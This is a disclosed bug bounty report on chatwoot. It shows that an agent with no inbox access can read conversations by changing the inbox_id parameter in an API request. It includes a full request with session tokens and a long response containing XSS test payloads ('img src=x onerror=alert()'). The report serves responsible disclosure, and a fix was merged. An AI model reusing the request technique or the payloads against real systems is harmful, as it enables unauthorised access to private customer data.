Execution with Unnecessary Privileges in chatwoot/chatwoot

Valid

Reported on

Jun 16th 2021


💥 BUG

unprivileged user can see ticket content

💥 IMPACT

User does not have any inboixes but still can see ticket details in inbox .

💥 STEP TO REPRODUCE

1.First from admin account goto https://app.chatwoot.com/app/accounts/4534/settings/agents/list and add new agent user-B .
Now dont add this agent to any invoxes .

2. Now admin goto https://app.chatwoot.com/app/accounts/4534/settings/inboxes/list and add a inboxes and add some converasation to this inbox .
User-B should not seee any of this content here .

3. Now goto user B account and sent bellow request to get all ticket detials and last message converation .

GET /api/v1/accounts/4534/conversations?inbox_id=3763&status=open&assignee_type=all&page=1 HTTP/1.1
Host: app.chatwoot.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://app.chatwoot.com/app/accounts/4534/inbox/3763
access-token: GcMVkR0HlMrDhsu1LpF4Cw
token-type: Bearer
client: W0v7b8j_CBiPQJ5glU-QwQ
expiry: 1629105170
uid: yijah65812@greenkic.com
Connection: close
Cookie: .......
ACCOUNT: TEST2

Here in this request change inbox_id parameter value to above created inbox_id and see it disclose all ticket and last converation message.\

So, user B does not have access-permission in perticular inbox but still can see conversation .
Response look like...


{
    "data": {
        "payload": [
            {
                "inbox_id": 3763, 
                "contact_last_seen_at": 1618518252, 
                "agent_last_seen_at": 1623840039, 
                "labels": [], 
                "unread_count": 0, 
                "can_reply": true, 
                "account_id": 4534, 
                "meta": {
                    "channel": "Channel::WebWidget", 
                    "team": {
                        "is_member": true, 
                        "description": "xss\"'><img src=x onerror=alert(22)>", 
                        "account_id": 4534, 
                        "name": "team1", 
                        "id": 95, 
                        "allow_auto_assign": true
                    }, 
                    "sender": {
                        "identifier": null, 
                        "thumbnail": "https://www.gravatar.com/avatar/789e53074826713fb8ba1b3d68a0876f?d=404", 
                        "custom_attributes": {}, 
                        "availability_status": "offline", 
                        "last_activity_at": 1619785206, 
                        "name": "sdfsj", 
                        "phone_number": null, 
                        "id": 2317584, 
                        "email": "sdfsj@sddsd.com", 
                        "additional_attributes": {
                            "description": "", 
                            "social_profiles": {
                                "facebook": "xss\"'><", 
                                "linkedin": "", 
                                "twitter": ""
                            }, 
                            "company_name": ""
                        }
                    }, 
                    "assignee": {
                        "thumbnail": "https://www.gravatar.com/avatar/8b40af07ac602b05ac7d793cdd19381c?d=404", 
                        "role": "administrator", 
                        "confirmed": true, 
                        "availability_status": "online", 
                        "available_name": "admin", 
                        "account_id": 4534, 
                        "name": "xss\"'><img src=x onerror=alert()>", 
                        "id": 5634, 
                        "email": "jihadi8106@tripaco.com"
                    }
                }, 
                "messages": [
                    {
                        "private": false, 
                        "inbox_id": 3763, 
                        "sender_type": null, 
                        "created_at": 1623840036, 
                        "message_type": 2, 
                        "content": "xss\"'><img src=x onerror=alert()> self-assigned this conversation", 
                        "sender_id": null, 
                        "account_id": 4534, 
                        "updated_at": "2021-06-16T10:40:36.748Z", 
                        "content_type": "text", 
                        "external_source_ids": {}, 
                        "conversation_id": 5, 
                        "id": 1132106, 
                        "source_id": null, 
                        "content_attributes": {}, 
                        "status": "sent"
                    }
                ], 
                "id": 5, 
                "muted": false, 
                "status": "open", 
                "timestamp": 1623840036, 
                "additional_attributes": {
                    "referer": "asdaD://asd.com/?id=xss\"'><img+src=x>", 
                    "initiated_at": {
                        "timestamp": "Fri Apr 16 2021 01:12:47 GMT+0530 (India Standard Time)"
                    }, 
                    "browser": {
                        "browser_name": "Internet Explorer", 
                        "device_name": "Unknown", 
                        "platform_version": "0", 
                        "platform_name": "Windows", 
                        "browser_version": "6.0"
                    }
                }
            }, 
            {
                "inbox_id": 3763, 
                "contact_last_seen_at": 0, 
                "agent_last_seen_at": 1623838161, 
                "labels": [], 
                "unread_count": 0, 
                "can_reply": true, 
                "account_id": 4534, 
                "meta": {
                    "channel": "Channel::WebWidget", 
                    "sender": {
                        "identifier": null, 
                        "thumbnail": "https://www.gravatar.com/avatar/73e6c30aea260d128bde190fb90be2be?d=404", 
                        "custom_attributes": {}, 
                        "availability_status": "offline", 
                        "last_activity_at": 1618566241, 
                        "name": "delicate-sunset-819", 
                        "phone_number": "", 
                        "id": 2327357, 
                        "email": "aaa@dsddd.comw", 
                        "additional_attributes": {
                            "description": "", 
                            "social_profiles": {
                                "facebook": "", 
                                "linkedin": "", 
                                "twitter": ""
                            }, 
                            "company_name": ""
                        }
                    }, 
                    "assignee": {
                        "thumbnail": "https://www.gravatar.com/avatar/601c09191d32c1ae061ac0140576c9e8?d=404", 
                        "role": "agent", 
                        "confirmed": true, 
                        "availability_status": "offline", 
                        "available_name": "user2", 
                        "account_id": 4534, 
                        "name": "user2", 
                        "id": 5646, 
                        "email": "wocali9440@tripaco.com"
                    }
                }, 
                "messages": [
                    {
                        "private": false, 
                        "inbox_id": 3763, 
                        "sender_type": "User", 
                        "created_at": 1618566238, 
                        "message_type": 1, 
                        "content": "Hhh", 
                        "sender_id": 5646, 
                        "account_id": 4534, 
                        "updated_at": "2021-04-16T09:43:58.039Z", 
                        "content_type": null, 
                        "external_source_ids": {}, 
                        "sender": {
                            "type": "user", 
                            "available_name": "user2", 
                            "availability_status": "offline", 
                            "avatar_url": "https://www.gravatar.com/avatar/601c09191d32c1ae061ac0140576c9e8?d=404", 
                            "name": "user2", 
                            "id": 5646
                        }, 
                        "conversation_id": 7, 
                        "id": 393679, 
                        "source_id": null, 
                        "content_attributes": {}, 
                        "status": "sent"
                    }
                ], 
                "id": 7, 
                "muted": false, 
                "status": "open", 
                "timestamp": 1618566238, 
                "additional_attributes": {
                    "referer": "http://localhost/poc/chatwoot.html", 
                    "initiated_at": {
                        "timestamp": "Fri Apr 16 2021 12:32:21 GMT+0530 (India Standard Time)"
                    }, 
                    "browser": {
                        "browser_name": "Firefox", 
                        "device_name": "Unknown", 
                        "platform_version": "0", 
                        "platform_name": "Generic Linux", 
                        "browser_version": "85.0"
                    }
                }
            }, 
            {
                "inbox_id": 3763, 
                "contact_last_seen_at": 0, 
                "agent_last_seen_at": 1623838161, 
                "labels": [], 
                "unread_count": 0, 
                "can_reply": true, 
                "account_id": 4534, 
                "meta": {
                    "channel": "Channel::WebWidget", 
                    "sender": {
                        "identifier": null, 
                        "thumbnail": "", 
                        "custom_attributes": {}, 
                        "availability_status": "offline", 
                        "last_activity_at": 1619784301, 
                        "name": "misty-moon-0", 
                        "phone_number": null, 
                        "id": 2317441, 
                        "email": null, 
                        "additional_attributes": {}
                    }, 
                    "assignee": {
                        "thumbnail": "https://www.gravatar.com/avatar/8b40af07ac602b05ac7d793cdd19381c?d=404", 
                        "role": "administrator", 
                        "confirmed": true, 
                        "availability_status": "online", 
                        "available_name": "admin", 
                        "account_id": 4534, 
                        "name": "xss\"'><img src=x onerror=alert()>", 
                        "id": 5634, 
                        "email": "jihadi8106@tripaco.com"
                    }
                }, 
                "messages": [
                    {
                        "private": false, 
                        "inbox_id": 3763, 
                        "sender_type": "User", 
                        "created_at": 1618565782, 
                        "message_type": 1, 
                        "content": "http://example.com", 
                        "sender_id": 5634, 
                        "account_id": 4534, 
                        "updated_at": "2021-04-16T09:36:22.792Z", 
                        "content_type": null, 
                        "external_source_ids": {}, 
                        "sender": {
                            "type": "user", 
                            "available_name": "admin", 
                            "availability_status": "online", 
                            "avatar_url": "https://www.gravatar.com/avatar/8b40af07ac602b05ac7d793cdd19381c?d=404", 
                            "name": "xss\"'><img src=x onerror=alert()>", 
                            "id": 5634
                        }, 
                        "conversation_id": 2, 
                        "id": 393617, 
                        "source_id": null, 
                        "content_attributes": {}, 
                        "status": "sent"
                    }
                ], 
                "id": 2, 
                "muted": false, 
                "status": "open", 
                "timestamp": 1618565782, 
                "additional_attributes": {
                    "referer": "http://localhost/poc/chatwoot.html", 
                    "initiated_at": {
                        "timestamp": "Fri Apr 16 2021 01:09:24 GMT+0530 (India Standard Time)"
                    }, 
                    "browser": {
                        "browser_name": "Internet Explorer", 
                        "device_name": "Unknown", 
                        "platform_version": "5.0", 
                        "platform_name": "Windows", 
                        "browser_version": "6.0"
                    }
                }
            }, 
            {
                "inbox_id": 3763, 
                "contact_last_seen_at": 0, 
                "agent_last_seen_at": 1619763980, 
                "labels": [], 
                "unread_count": 0, 
                "can_reply": true, 
                "account_id": 4534, 
                "meta": {
                    "channel": "Channel::WebWidget", 
                    "sender": {
                        "identifier": null, 
                        "thumbnail": "", 
                        "custom_attributes": {}, 
                        "availability_status": "offline", 
                        "last_activity_at": 1619763980, 
                        "name": "purple-frog-188", 
                        "phone_number": null, 
                        "id": 2317496, 
                        "email": null, 
                        "additional_attributes": {}
                    }, 
                    "assignee": {
                        "thumbnail": "https://www.gravatar.com/avatar/8b40af07ac602b05ac7d793cdd19381c?d=404", 
                        "role": "administrator", 
                        "confirmed": true, 
                        "availability_status": "online", 
                        "available_name": "admin", 
                        "account_id": 4534, 
                        "name": "xss\"'><img src=x onerror=alert()>", 
                        "id": 5634, 
                        "email": "jihadi8106@tripaco.com"
                    }
                }, 
                "messages": [
                    {
                        "private": false, 
                        "inbox_id": 3763, 
                        "sender_type": "Contact", 
                        "created_at": 1618515820, 
                        "message_type": 0, 
                        "content": "dddhi", 
                        "sender_id": 2317496, 
                        "account_id": 4534, 
                        "updated_at": "2021-04-15T19:43:40.544Z", 
                        "content_type": "text", 
                        "external_source_ids": {}, 
                        "sender": {
                            "identifier": null, 
                            "thumbnail": "", 
                            "pubsub_token": "ZUbp1KYVyeWJGd2QH9nnsEJS", 
                            "type": "contact", 
                            "name": "purple-frog-188", 
                            "phone_number": null, 
                            "id": 2317496, 
                            "email": null, 
                            "additional_attributes": {}
                        }, 
                        "conversation_id": 3, 
                        "id": 392017, 
                        "source_id": null, 
                        "content_attributes": {}, 
                        "status": "sent"
                    }
                ], 
                "id": 3, 
                "muted": false, 
                "status": "open", 
                "timestamp": 1618515820, 
                "additional_attributes": {
                    "referer": "http://localhost/poc/chatwoot.html", 
                    "initiated_at": {
                        "timestamp": "Fri Apr 16 2021 01:12:47 GMT+0530 (India Standard Time)"
                    }, 
                    "browser": {
                        "browser_name": "Internet Explorer", 
                        "device_name": "Unknown", 
                        "platform_version": "5.0", 
                        "platform_name": "Windows", 
                        "browser_version": "6.0"
                    }
                }
            }
        ], 
        "meta": {
            "all_count": 4, 
            "mine_count": 0, 
            "unassigned_count": 0
        }
    }
}
Sojan Jose validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sojan Jose
a year ago

Maintainer


fixed in https://github.com/chatwoot/chatwoot/pull/2224

Sojan Jose confirmed that a fix has been merged on 534acf a month ago
The fix bounty has been dropped
to join this conversation